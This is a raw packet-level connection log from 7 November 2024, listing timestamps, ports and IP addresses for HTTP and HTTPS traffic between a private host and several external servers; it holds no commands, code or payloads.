Nov 7, 2024 07:33:07.484822035 CET	49791	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:07.484842062 CET	443	49791	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.484899044 CET	49791	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:07.484997988 CET	49791	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:07.485008001 CET	443	49791	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.543963909 CET	443	49789	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.544087887 CET	443	49789	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.544133902 CET	49789	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:07.544173002 CET	49789	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:07.544173002 CET	49789	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:07.544181108 CET	443	49789	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.544188023 CET	443	49789	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.546315908 CET	49792	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:07.546329021 CET	443	49792	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.546384096 CET	49792	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:07.546449900 CET	443	49788	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.546473026 CET	49792	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:07.546482086 CET	443	49792	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.546494961 CET	443	49788	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.546536922 CET	49788	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:07.546586037 CET	49788	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:07.546593904 CET	443	49788	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.546602964 CET	49788	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:07.546607018 CET	443	49788	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.548078060 CET	49793	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:07.548130989 CET	443	49793	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.548176050 CET	49793	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:07.548261881 CET	49793	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:07.548279047 CET	443	49793	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.557154894 CET	80	49787	185.215.113.43	192.168.2.4
Nov 7, 2024 07:33:07.557208061 CET	49787	80	192.168.2.4	185.215.113.43
Nov 7, 2024 07:33:07.573205948 CET	49794	80	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:07.578130007 CET	80	49794	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:07.578197002 CET	49794	80	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:07.578289032 CET	49794	80	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:07.583060980 CET	80	49794	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:08.079005003 CET	443	49790	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:08.109678984 CET	49790	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:08.109694004 CET	443	49790	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:08.110991955 CET	49790	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:08.110996962 CET	443	49790	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:08.215648890 CET	443	49791	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:08.216026068 CET	49791	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:08.216037989 CET	443	49791	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:08.216433048 CET	49791	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:08.216435909 CET	443	49791	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:08.243808985 CET	443	49790	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:08.244278908 CET	443	49790	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:08.244333029 CET	49790	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:08.244365931 CET	49790	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:08.244371891 CET	443	49790	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:08.244381905 CET	49790	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:08.244390011 CET	443	49790	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:08.246468067 CET	49795	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:08.246498108 CET	443	49795	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:08.246572971 CET	49795	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:08.246681929 CET	49795	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:08.246695042 CET	443	49795	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:08.269603968 CET	443	49792	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:08.270093918 CET	49792	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:08.270102978 CET	443	49792	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:08.270706892 CET	49792	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:08.270710945 CET	443	49792	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:08.286135912 CET	443	49793	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:08.286982059 CET	49793	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:08.286999941 CET	443	49793	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:08.287379026 CET	49793	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:08.287383080 CET	443	49793	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.344424009 CET	443	49791	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.344470978 CET	443	49791	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.344533920 CET	49791	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.344624996 CET	443	49793	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.344676018 CET	443	49792	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.344724894 CET	443	49792	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.344727993 CET	49791	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.344744921 CET	443	49791	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.344755888 CET	49791	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.344759941 CET	443	49791	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.344762087 CET	49792	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.345058918 CET	80	49794	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:09.345068932 CET	443	49793	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.345115900 CET	49794	80	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:09.345448971 CET	49793	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.345516920 CET	80	49794	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:09.345544100 CET	80	49794	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:09.345573902 CET	49794	80	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:09.345587969 CET	49794	80	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:09.345854998 CET	49792	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.345870972 CET	443	49792	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.345880032 CET	49792	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.345885038 CET	443	49792	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.345992088 CET	49793	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.346008062 CET	443	49793	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.346016884 CET	49793	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.346021891 CET	443	49793	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.346029997 CET	80	49794	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:09.346061945 CET	49794	80	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:09.348527908 CET	49796	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.348555088 CET	443	49796	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.348614931 CET	49796	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.348681927 CET	49797	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.348695040 CET	443	49797	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.348742962 CET	49797	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.348829031 CET	49796	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.348839045 CET	443	49796	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.348972082 CET	49797	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.348983049 CET	443	49797	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.349704027 CET	49798	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.349711895 CET	443	49798	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.349764109 CET	49798	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.349863052 CET	49798	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.349872112 CET	443	49798	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.352179050 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:09.352186918 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:09.352241039 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:09.363594055 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:09.363604069 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:09.480788946 CET	443	49795	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.481143951 CET	49795	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.481162071 CET	443	49795	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.481794119 CET	49795	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.481798887 CET	443	49795	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.525572062 CET	49723	80	192.168.2.4	93.184.221.240
Nov 7, 2024 07:33:09.525640011 CET	49724	80	192.168.2.4	93.184.221.240
Nov 7, 2024 07:33:09.532253981 CET	80	49723	93.184.221.240	192.168.2.4
Nov 7, 2024 07:33:09.532313108 CET	49723	80	192.168.2.4	93.184.221.240
Nov 7, 2024 07:33:09.532340050 CET	80	49724	93.184.221.240	192.168.2.4
Nov 7, 2024 07:33:09.532392979 CET	49724	80	192.168.2.4	93.184.221.240
Nov 7, 2024 07:33:09.610477924 CET	443	49795	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.610526085 CET	443	49795	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.610569954 CET	49795	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.610672951 CET	49795	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.610686064 CET	443	49795	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.610694885 CET	49795	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.610698938 CET	443	49795	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.612574100 CET	49800	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.612600088 CET	443	49800	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.612670898 CET	49800	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.612787962 CET	49800	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.612799883 CET	443	49800	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.773469925 CET	443	49785	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.773880959 CET	49785	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.773900986 CET	443	49785	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.774270058 CET	49785	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.774277925 CET	443	49785	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.903036118 CET	443	49785	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.903151035 CET	443	49785	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.903201103 CET	49785	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.903280973 CET	49785	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.903294086 CET	443	49785	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.903302908 CET	49785	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.903306961 CET	443	49785	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.905570984 CET	49801	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.905597925 CET	443	49801	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.905673981 CET	49801	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.905801058 CET	49801	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:09.905813932 CET	443	49801	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:09.967330933 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:09.967410088 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:10.033736944 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:10.033749104 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.033951998 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.034003019 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:10.037209034 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:10.080764055 CET	443	49796	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.080893993 CET	443	49797	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.081111908 CET	49796	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.081118107 CET	443	49796	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.081365108 CET	49797	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.081377029 CET	443	49797	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.081562042 CET	443	49798	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.081913948 CET	49796	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.081918001 CET	443	49796	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.082015991 CET	49797	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.082020998 CET	443	49797	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.082091093 CET	49798	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.082102060 CET	443	49798	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.082412958 CET	49798	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.082417011 CET	443	49798	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.083343029 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.211556911 CET	443	49798	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.211656094 CET	443	49798	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.211707115 CET	49798	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.211848974 CET	49798	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.211859941 CET	443	49798	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.211868048 CET	49798	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.211873055 CET	443	49798	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.212151051 CET	443	49797	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.212572098 CET	443	49797	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.212619066 CET	49797	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.212733030 CET	49797	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.212742090 CET	443	49797	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.212750912 CET	49797	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.212759972 CET	443	49797	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.214265108 CET	443	49796	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.214499950 CET	443	49796	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.214535952 CET	49796	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.214831114 CET	49802	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.214854956 CET	443	49802	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.214917898 CET	49802	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.215166092 CET	49796	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.215171099 CET	443	49796	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.215186119 CET	49796	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.215189934 CET	443	49796	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.216533899 CET	49803	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.216567039 CET	443	49803	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.216623068 CET	49803	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.216707945 CET	49802	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.216721058 CET	443	49802	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.217334032 CET	49804	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.217365980 CET	443	49804	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.217417002 CET	49804	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.217463970 CET	49803	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.217478037 CET	443	49803	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.217530966 CET	49804	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.217544079 CET	443	49804	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.352140903 CET	443	49800	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.372245073 CET	49800	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.372267008 CET	443	49800	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.429779053 CET	49800	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.429789066 CET	443	49800	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.553699017 CET	443	49800	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.553823948 CET	443	49800	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.553874969 CET	49800	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.564271927 CET	49800	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.564289093 CET	443	49800	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.564300060 CET	49800	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.564305067 CET	443	49800	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.623593092 CET	49805	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.623622894 CET	443	49805	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.623682022 CET	49805	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.623971939 CET	49805	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.623985052 CET	443	49805	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.652694941 CET	443	49801	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.667170048 CET	49801	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.667181015 CET	443	49801	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.667589903 CET	49801	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.667593956 CET	443	49801	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.795114040 CET	443	49801	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.795253992 CET	443	49801	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.795392990 CET	49801	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.796992064 CET	49801	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.797010899 CET	443	49801	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.797032118 CET	49801	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.797039032 CET	443	49801	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.799350977 CET	49806	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.799375057 CET	443	49806	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.799439907 CET	49806	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.799566984 CET	49806	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.799582958 CET	443	49806	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.850949049 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.851010084 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:10.851016045 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.851026058 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.851059914 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:10.851375103 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.851423025 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.851470947 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:10.851478100 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.851516962 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:10.852281094 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.852431059 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:10.852436066 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.852483988 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:10.852700949 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.852750063 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:10.852755070 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.852797031 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:10.949093103 CET	443	49802	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.949106932 CET	443	49804	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.949460983 CET	49804	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.949470997 CET	443	49804	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.949592113 CET	49802	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.949611902 CET	443	49802	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.949868917 CET	49804	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.949873924 CET	443	49804	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.949951887 CET	49802	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.949955940 CET	443	49802	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.957751036 CET	443	49803	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.959228039 CET	49803	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.959263086 CET	443	49803	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.959563971 CET	49803	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:10.959580898 CET	443	49803	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:10.967653036 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.967708111 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.967767000 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:10.967773914 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.968300104 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.968333006 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.968353033 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:10.968358994 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.968368053 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:10.968394995 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:10.968398094 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.970235109 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.970293999 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:10.970299006 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.970942020 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:10.972840071 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.973819017 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.973843098 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.973865986 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:10.973867893 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.973876953 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.973891973 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:10.973906994 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:10.978297949 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.978615046 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.978640079 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.978640079 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:10.978647947 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.978662014 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:10.978688955 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:10.978889942 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.978945971 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:10.979094028 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.982944965 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:10.982949972 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:10.982990026 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.080610991 CET	443	49804	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.080648899 CET	443	49804	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.080696106 CET	443	49802	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.080816984 CET	443	49802	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.080818892 CET	49804	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.080873013 CET	49802	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.081042051 CET	49804	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.081049919 CET	443	49804	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.081068993 CET	49804	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.081070900 CET	49802	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.081070900 CET	49802	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:11.081077099 CET	443	49804	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.081082106 CET	443	49802	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.081089020 CET	443	49802	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:11.081444979 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.082014084 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.082039118 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.082075119 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.082083941 CET	443	49799	172.67.195.247	192.168.2.4
Nov 7, 2024 07:33:11.082108021 CET	49799	443	192.168.2.4	172.67.195.247
Nov 7, 2024 07:33:11.082119942 CET	49799	443	192.168.2.4	172.67.195.247
